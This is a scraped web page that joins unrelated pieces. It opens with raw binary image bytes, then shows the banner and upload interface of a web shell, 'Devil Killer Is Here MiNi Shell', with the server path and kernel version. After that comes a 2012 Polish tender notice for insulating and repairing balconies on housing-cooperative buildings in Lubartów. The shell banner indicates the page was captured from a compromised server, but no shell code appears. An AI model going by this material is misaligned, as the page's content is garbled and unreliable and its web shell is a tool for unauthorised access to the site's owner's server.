JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120402/74771-N-2012.html

<p class="kh_header"><b>Lubartów: Wykonanie robót budowlanych w zakresie termomodernizacji budynków mieszkalnych wielorodzinnych wraz z remontem balkonów na budynkach przy ul. Cichej 15A, Powstańców Warszawy 5 i 15 oraz remont balkonów w budynku mieszkalnym wielorodzinnym przy ul. Lubelskiej 77 zlokalizowanych w Lubartowie będących w zasobach SM Lubartów.</b><br>
<b>Numer ogłoszenia: 74771 - 2012; data zamieszczenia: 02.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Spółdzielnia Mieszkaniowa w Lubartowie , ul. Cicha 6, 21-100 Lubartów, woj. lubelskie, tel. 081 463 90 01, faks 081 855 30 15.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.smlubartow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółdzielnia Mieszkaniowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych w zakresie termomodernizacji budynków mieszkalnych wielorodzinnych wraz z remontem balkonów na budynkach przy ul. Cichej 15A, Powstańców Warszawy 5 i 15 oraz remont balkonów w budynku mieszkalnym wielorodzinnym przy ul. Lubelskiej 77 zlokalizowanych w Lubartowie będących w zasobach SM Lubartów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest  wykonanie robót budowlanych w zakresie termomodernizacji budynków mieszkalnych wielorodzinnych wraz z remontem balkonów na budynkach przy ul. Cichej 15A, Powstańców Warszawy 5 i 15 oraz remont balkonów w budynku mieszkalnym wielorodzinnym przy ul. Lubelskiej 77 zlokalizowanych w Lubartowie będących w zasobach SM Lubartów

Przedmiot zamówienia wg Wspólnego Słownika Zamówień (CPV): 
45.00.00.00-7 Roboty budowlane  
45261214-7 Kładzenie dachów bitumicznych 
45450000-6 Roboty budowlane wykończeniowe, pozostałe 
45453000-7 Roboty remontowe i renowacyjne
45233250-6  Roboty w zakresie nawierzchni, z wyjątkiem dróg
45262900-0 Roboty balkonowe
45262690-4 Remont starych budynków

2. Budynki objęte termomodernizacją: przy ul. Cichej 15A, Powstańców Warszawy 5 i 15.
Budynek przy ul. Lubelskiej 77 -  remont balkonów.
Każdy z budynków wymienionych w zdaniu powyżej stanowi odrębną część zamówienia. Wykonawcy winni składać oferty na poszczególne części zamówienia - budynki.
Wykonawca może złożyć ofertę na minimum 1 budynek lub maksymalnie na 4 budynki.

3.Ogólny zakres robót wskazany jest poniżej - szczegółowy opis każdego budynku znajduje się w opracowanej dokumentacji technicznej, przedmiarach robót i szczegółowym opisie w niniejszej SIWZ:
	Ocieplenie ścian zewnętrznych styropianem (metodą lekką-mokrą)
	Ocieplenie cokołu 
	Przebudowa instalacji odgromowej 
	Wymiana obróbek blacharskich, w tym rynien i rur spustowych
             Wykonanie pokrycia dachowego z papy termozgrzewalnej 
	Renowacja kominów
	Renowacja żelbetowych daszków wejściowych 
            Remont balkonów 
            Wymiana opaski wokół budynku
            Kompletne obrobienie glifów na zewnątrz (okien i drzwi) wraz z obróbkami blacharskimi
 
Zakres robót towarzyszących: 
		Roboty przygotowawcze np. zabezpieczenie okien - (okna winny być zabezpieczone folią
            przeźroczystą), balustrad, parapetów itp. na czas wykonywanych prac
         Demontaż i ponowny montaż różnych elementów znajdujących się przy budynku (np. daszków nad balkonami, tablic administracyjnych, suszarek na wysięgnikach, tablic informacyjnych)
        Wykonanie niezbędnych prac tynkarskich i malarskich 
         Podwyższenie kratek wentylacyjnych stropodachów o ile zostaną zakryte przy dociepleniu stropodachu.
 	Uporządkowanie placu budowy wraz z wywozem gruzu i odpadów oraz ich utylizacja w tym płyt azbestowych i przywrócenie terenu do stanu pierwotnego
	Niezbędne przekucia ścian
Technologia wykonania robót oparta o systemy ocieplenia metodą lekko-mokrą w systemie dopuszczonym do stosowania. System oraz wszelkie zastosowane materiały musza być dopuszczone do stosowania zgodnie z pkt. III 9.
Przyjęty do realizacji system ocieplenia metodą BSO musi być realizowany tylko w oparciu o materiały z danego systemu. Nie dopuszcza się stosowania materiałów z różnych systemów i tym samym przemieszania rozwiązań poszczególnych technologii.

Rozszerzenie i uściślenie zakresu do załączonej przy SIWZ dokumentacji technicznej i przedmiarów robót na budynki objęte przedmiotem zamówienia, które należy wykonać i uwzględnić w wycenie robót.
Balkony
a) wywinięcie papy na ścianę na połączeniu ściany z izolacją na wszystkich balkonach budynku przy ul. Cicha 15A, Powstańców Warszawy 5 i Lubelska 77. 
b) Warstwa wykończeniowa z płytek ceramicznych mrozoodpornych, antypoślizgowych ( R10 lub R11) na zaprawie klejowej mrozoodpornej elastycznej. Dobór koloru płytek pozostawia się w gestii inwestora - pozycja uwzględniona w przedmiarze.
c) Czoła warstwy dociskowej balkonów należy zabezpieczyć materiałem izolacyjnym odpornym na promieniowanie ultrafioletowe dotyczy budynków Powstańców Warszawy 5, Cicha 15A i Lubelska 77- pozycja nie uwzględniona w przedmiarze.
d) Odległość pomiędzy dolnymi krawędziami/płaskownikiem balustrad a linią płytek na balkonach ma zapewnić swobodny odpływ wody minimalny prześwit 3 cm. Odległość pomiędzy pionowym prętem balustrad nie może tworzyć mostka termicznego. W razie konieczności należy wyciąć pionowy pręt balustrady.
e) Wykonać uzupełnienie ubytków betonu płyt balkonowych, również po skuciu terakoty, odkryte pręty zbrojeniowe należy oczyścić z korozji i pokryć materiałami zabezpieczającymi.
f) Uzupełnienie prześwitów pomiędzy elementami wypełnienia balustrad aby nie przekraczały 0,12m
g) docieplenie styropianem twardym EPS-100-038 o grubości min. 3 cm progu przy drzwiach balkonowych od strony balkonu dotyczy budynków przy ul. Cicha 15A, Powstańców Warszawy 5 i Lubelska 77 - pozycja nie ujęta w przedmiarze.
h) obróbki blacharskie na balkonach powinny być wykonane w sposób ciągły ( łączone na rąbek).
Opaska
i) Koryta odprowadzające wodę z rur deszczowych muszą posiadać długość minimum 2 mb od budynku - dotyczy wszystkich budynków przy których wykonywane są roboty termomodernizacyjne.
Roboty dociepleniowe
j) Styropian użyty przy dociepleniu ścian nie może stykać się z materiałami na bazie rozpuszczalników (możliwość wystąpienia mostków termicznych). Powyższe miejsca należy odpowiednio zabezpieczyć przed położeniem styropianu. W przypadku bezpośredniego stykania się materiałów wchodzących w reakcję należy stosować środek uniemożliwiający wejście w reakcję.
k) Grubość styropianu podana w dokumentacji projektowej powinna być traktowana jako minimalna. Zamawiający nie dopuszcza używania materiału o mniejszej grubości.
Dachy  
l) Przy renowacji kominów należy zamontować kratki wentylacyjne w taki sposób by umożliwiały wykonanie okresowego czyszczenia. Czapki kominowe na budynkach na których będzie wykonywana renowacja kominów należy pokryć papą termozgrzewalną wierzchniego krycia i wykonać obróbkę blacharską krawędzi z blachy ocynkowanej - dotyczy budynków: Cicha 15A, Powstańców Warszawy 5 ( budynek Cicha 15A zakres robót ujęty w przedmiarze).
m) Wykonać kosze do rur spustowych dotyczy wszystkich budynków objętych robotami termomodernizacyjnymi - budynek Cicha 15A kosze nie ujęte w przedmiarze.
Budynki Powstańców Warszawy 5 i 15 pozycja kosze ujęta w przedmiarze.
n) Przy obróbce kominów i ogniomurów papę wywinąć na wysokości 0,5 m wraz z zamocowaniem listew dociskowych z blachy ocynkowanej. Na kominach o wysokości około 0,5 m papę położyć na całej wysokości ściany kominów dotyczy budynku Cicha 15A.
Roboty różne dotyczące budynku Cicha 15A:
Wykonać remont wiatrołapu przy ul. Cicha 15A. Remont polegał będzie na zabudowaniu ścian o konstrukcji stalowej bocznych i frontowej płytami OSB o grubości  około 2,5 cm ( płyty zabezpieczono przeciwwilgociowo). Do płyt OSB i konstrukcji stalowej od zewnątrz i wewnątrz należy przykleić styropian EPS -100 -038 o grubości 3 cm na klej dyspersyjny (np. Prince Color
 Z 301 DK). Na styropianie należy wykonać warstwę zbrojącą zatopiona siatką z włókna szklanego(x2).Na całości od wewnątrz i zewnątrz wykonać podkład tynkarski i tynk mozaikowy w kolorze elewacji. Płyty OSB zamontować w miejsce zdemontowanego szkła zbrojonego - roboty nie ujęte w przedmiarze.
Docieplenie ścian loggii należy wykonać w następujący sposób:
1.Ścianki zewnętrzne docieplić styropianem grubości 5 cm. 
2.Ścianki ciepłe loggii pion mieszkań 1,5,9,13,17 i jedna ścianka w pionie mieszkań od strony pokoju 2,6,10,14,18 docieplenie styropianem grubości 11 cm.
3.Zimne ścianki loggii pion pomiędzy mieszkaniami 2,6,10,14,18 i 3,7,11,15,19 należy wykonać tylko wyprawę elewacyjną na siatce bez docieplenia styropianem zgodnie z kolorystyką elewacji. 
4.Pozostałe wewnętrzne ścianki loggii docieplenie styropianem grubości 5 cm ( dwie ścianki w pionie mieszkań 4,8,12,16,20 jedna ścianka w pionie mieszkań 3,7,11,15,19).
Szczegółowe docieplenie ścian loggii zostało wykazane w załączonym przedmiarze robót. 
Na czoła ścianek loggii należy położyć wyprawę tynkarską na siatce w kolorze opracowanej kolorystyki elewacji. Czoła płyt loggii zostały ujęte w przedmiarze razem z naprawa płyt loggii. 
Na płytkach gzymsu należy uzupełnić ubytki betonu i wykonać warstwę klejowo-szpachlową dodatkowo zastosować siatkę i pokryć tynkiem mineralnym malowanym farbą silikonową wg kolorystyki budynku -  roboty te nie zostały ujęte w przedmiarze. Na murkach ogniowych na dachu należy dokonać wymiany obróbek blacharskich około 9 m2 - roboty nie ujęte w przedmiarze. Wyprawę tynkarską i remont ścianki naczynia zbiorczego wykonać jak remont i wyprawę na kominach - roboty te zostały ujęte w przedmiarze razem z kominami. 
5. Malowanie ekranów osłonowych na balkonach wykonać od zewnątrz i od wewnątrz balkonu, dwukrotne malowanie (farbą podkładową i nawierzchniową) w przedmiarze ujęte jest tylko malowanie zewnętrzne. 
6. Kraty okienne do malowania malowanie dwukrotne (farbą podkładową i nawierzchniową) tylko przy pomieszczeniu wymiennikowni 4 szt. pozostałe kraty okienne zostaną zdemontowane podczas wymiany stolarki okiennej.
Zastosowane materiały powinny być w I gatunku (najwyższej jakości), a zamontowane urządzenia, 
o udokumentowanym pochodzeniu, Wykonawca jest zobowiązany okazać i przekazać 
Zamawiającemu dla materiałów podlegających wbudowaniu: atesty, certyfikaty zgodności z 
Polską Normą lub aprobaty techniczne (w tym również oświadczenia wytwórcy, dostawcy),
zastosowane materiały muszą być w szczególności udokumentowane kartą techniczną materiału,
atestem higienicznym, aprobatą techniczną dopuszczającą dany materiał do stosowania. W
przypadku zastosowania przez Wykonawcę równoważnych materiałów i technologii w stosunku do
zaprojektowanych winny one zachować te same lub lepsze standardy techniczne, technologiczne i
jakościowe
4. Szczegółowe zakresy robót do wykonania na poszczególnych budynkach znajdują się w przedmiarach robót, projekcie budowlanym, projekcie wykonawczym i specyfikacji technicznej wykonania i odbioru robót oraz SIWZ w której zostały doprecyzowane i dopisane dodatkowe roboty w szczególności w pkt. III opisu przedmiotu zamówienia i ogólnych warunkach umowy. 
     Dokumentacja techniczna przebudowy instalacji odgromowej na budynek Cicha 15A, stanowi zał. nr 12.
	Przedmiary robót, projekty budowlane, projekty wykonawcze i specyfikacje techniczne wykonania i odbioru robót stanowią załącznik nr 10, 11, 12 do SWIZ i zamieszczone są na stronie internetowej www.smlubartow.pl 
5. Wykonawca zobowiązany jest uwzględnić wszystkie informacje, które mogą być konieczne do przygotowania oferty oraz mogą mieć wpływ na określenie ceny oferty, Zamawiający na wniosek Wykonawcy udostępni mu obiekty w celu przeprowadzenia wizji lokalnej.

Uwaga
6. W związku z tym, że roboty termomodernizacyjne ujęte w dokumentacji technicznej podzielone zostały na kilka odrębnych zamówień Wykonawca wykona i przyjmie do wyceny dla niniejszego zamówienia tylko ten rodzaj robót, który jest wskazany w opisie przedmiotu zamówienia. (Wymiana stolarki okiennej na klatkach schodowych i w piwnicach, drzwi zewnętrznych, docieplenie stropodachu stanowiły przedmiot oddzielnych zamówień). 

7. Wykonawca zutylizuje wszystkie zużyte materiały w szczególności również materiały pochodzące z ewentualnego demontażu, jeżeli taki demontaż będzie niezbędny do realizacji przedmiotu umowy, za wyjątkiem blachy z obróbek blacharskich w tym rynien i rur spustowych, którą Wykonawca zwróci Zamawiającemu, dostarczając do wskazanego przez Zamawiającego magazynu na terenie Lubartowa. Po utylizacji azbestu z budynku Powstańców Warszawy 5, Wykonawca przekaże kartę przekazania odpadów zawierających azbest oraz dostarczy oświadczenie, że prace zostały wykonane zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 14 sierpnia 1998 w sprawie bezpiecznego użytkowania oraz warunków usuwania wyrobów zawierających azbest ( Dz. U. 1998 Nr 138 poz. 895).

8. Zewnętrzną instalację odgromową należy wykonać z zachowaniem aktualnych norm:
1. na budynku mieszkalnym wielorodzinnym przy ul. Powstańców Warszawy 5 należy wykonać zwody poziome i pionowe zabezpieczające całość budynku wraz z wykonaniem otoku (wykonanie nowej instalacji odgromowej z drutu FeZn fi 8):
- montaż zwodów pionowych w rurkach instalacyjnych ( elewacje nieocieplone),
2. budynek Powstańców Warszawy 15 należy wykonać jednocześnie instalacje odgromową na budynkach Powstańców Warszawy 17 i 21 zgodnie z dokumentacją techniczną ujętą w załączniku nr 11.
- montaż zwodów pionowych w rurkach instalacyjnych ( elewacje nieocieplone),
- montaż zwodów pionowych na wspornikach ( elewacje ocieplone)
3. budynek Cicha 15A zewnętrzną instalację odgromową należy wykonać z zachowaniem aktualnych norm zgodnie z załączoną dokumentacją techniczną załącznik nr 12.
9. Jeżeli w dokumentacji projektowej zostały wskazane znaki towarowe, technologie docieplenia ścian, oraz pochodzenie materiałów należy je traktować jako propozycje projektanta. Zamawiający dopuszcza zastosowanie równoważnych materiałów i technologii w stosunku do zaprojektowanych z zachowaniem tych samych lub lepszych standardów technicznych, technologicznych i jakościowych. Zezwolenie projektanta na zastosowanie innych materiałów i technologii niż wykazane w dokumentacji stanowi Załącznik nr 13 do SIWZ. Ponadto materiały lub urządzenia przyjęte do wyceny:
winny spełniać funkcje jakiej maja służyć,
nie mogą wpływać na zmianę rodzaju i zakresu robót budowlanych,
zastosowane materiały do wybranej technologii docieplenia ścian muszą spełniać wymogi dla wybranego systemu i jak wskazano powyżej - muszą być udokumentowane, materiały powinny być w I gatunku (najwyższej jakości), a zamontowane urządzenia, o udokumentowanym pochodzeniu, Wykonawca jest zobowiązany okazać i przekazać Zamawiającemu dla materiałów podlegających wbudowaniu: atesty, certyfikaty zgodności z Polską Normą lub aprobaty techniczne (w tym również oświadczenia wytwórcy, dostawcy), zastosowane materiały muszą być w szczególności udokumentowane kartą techniczną materiału, atestem higienicznym, aprobatą techniczną dopuszczającą dany materiał do stosowania. W przypadku zastosowania przez Wykonawcę równoważnych materiałów i technologii w stosunku do zaprojektowanych winny one zachować te same lub lepsze standardy techniczne, technologiczne i jakościowe.      
  
10. Wykonawca zobowiązany jest do udzielenia gwarancji jakości na wykonane roboty na okres nie krótszy niż 60 miesięcy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.12.14-7, 45.45.00.00-6, 45.45.30.00-7, 45.23.32.50-6, 45.26.29.00-0, 45.26.26.90-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia przez Wykonawców wadium. Wykonawca przed upływem terminu składania ofert zobowiązany jest wnieść wadium w wysokości po 4.000,00 zł odrębnie w odniesieniu do każdej z części zamówienia (budynku), na którą składa ofertę.
2.Wadium wnoszone jest na cały okres związania ofertą i może być wnoszone w jednej lub kilku następujących formach:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych 
5) poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt 2 ustawy z dnia 
9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. z 2007 r. Nr. 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr.96, poz. 620).
3.Wadium wniesione w pieniądzu wpłaca się na rachunek bankowy Zamawiającego przelewem. Nr rachunku: PKO BP S.A. O/ Lubartów nr  57 1020 3206 0000 8402 0004 4255  z dopiskiem na przelewie Wadium na termomodernizację budynków przy ul. Cicha 15A, Powstańców Warszawy 5, 15 i remont balkonów w budynku przy ul. Lubelskiej 77 w Lubartowie znak sprawy NTI/R - 11/2012 O jego wniesieniu w terminie decydować będzie data wpływu na podany wyżej rachunek bankowy Zamawiającego. 
Zamawiający wymaga, aby w przypadku wniesienia wadium w formie: 
- pieniężnej dokument potwierdzający wpłatę wadium został dołączony do oferty,
- innej niż pieniądz, oryginał dokumentu został złożony w ofercie. 
4.Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub zamknięcia postępowania bez dokonania wyboru oferty, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
5.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano. 
6.Zamawiający niezwłocznie zwraca wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
7.Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je pomniejszone o koszty prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę (Wykonawca poda w ofercie numer konta na które należy zwrócić wadium wpłacone w formie pieniądza. W przypadku nie wskazania numeru konta Zamawiający zwróci je na rachunek bankowy z którego wadium wpłynęło.)
8.Zamawiający zatrzymuje wadium, jeżeli Wykonawca, którego oferta została wybrana: 
1)  odmówił podpisania umowy w sprawie zamówienia na warunkach określonych w ofercie; 
2)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
        3)  zawarcie umowy w sprawie zamówienia stało się niemożliwe z przyczyn leżących po    
        stronie Wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zał. nr 3 do SIWZ,
Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane przez Zamawiającego uprawnienia - zał. nr 6,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zał. nr 3 do SIWZ,
Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane przez Zamawiającego uprawnienia - zał. nr 6,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zał. nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zał. nr 3 do SIWZ,
Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane przez Zamawiającego uprawnienia - zał. nr 6,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zał. nr 3 do SIWZ,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>2. Dokument potwierdzający wpłatę wadium.
3. Oświadczenie o akceptacji warunków przetargu zał. nr. 2 do SIWZ.5. Wykaz robót budowlanych zał. nr 4, potwierdzonych dołączonymi referencjami.
6. Wykaz osób zdolnych do wykonania zamówienia ze wskazaniem podstawy dysponowania tymi osobami przez Wykonawcę - zał. nr 5,8. Oświadczenie o braku podstaw do wykluczenia z wykorzystaniem wzoru zał. nr.7
9. Opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. W przypadku gdy polisa zawarta jest na okres krótszy niż czas realizacji zamówienia, Wykonawca zobowiązany jest niezwłocznie dostarczyć polisę ubezpieczenia OC na kolejne okresy obejmujące łącznie czas realizacji zamówienia.
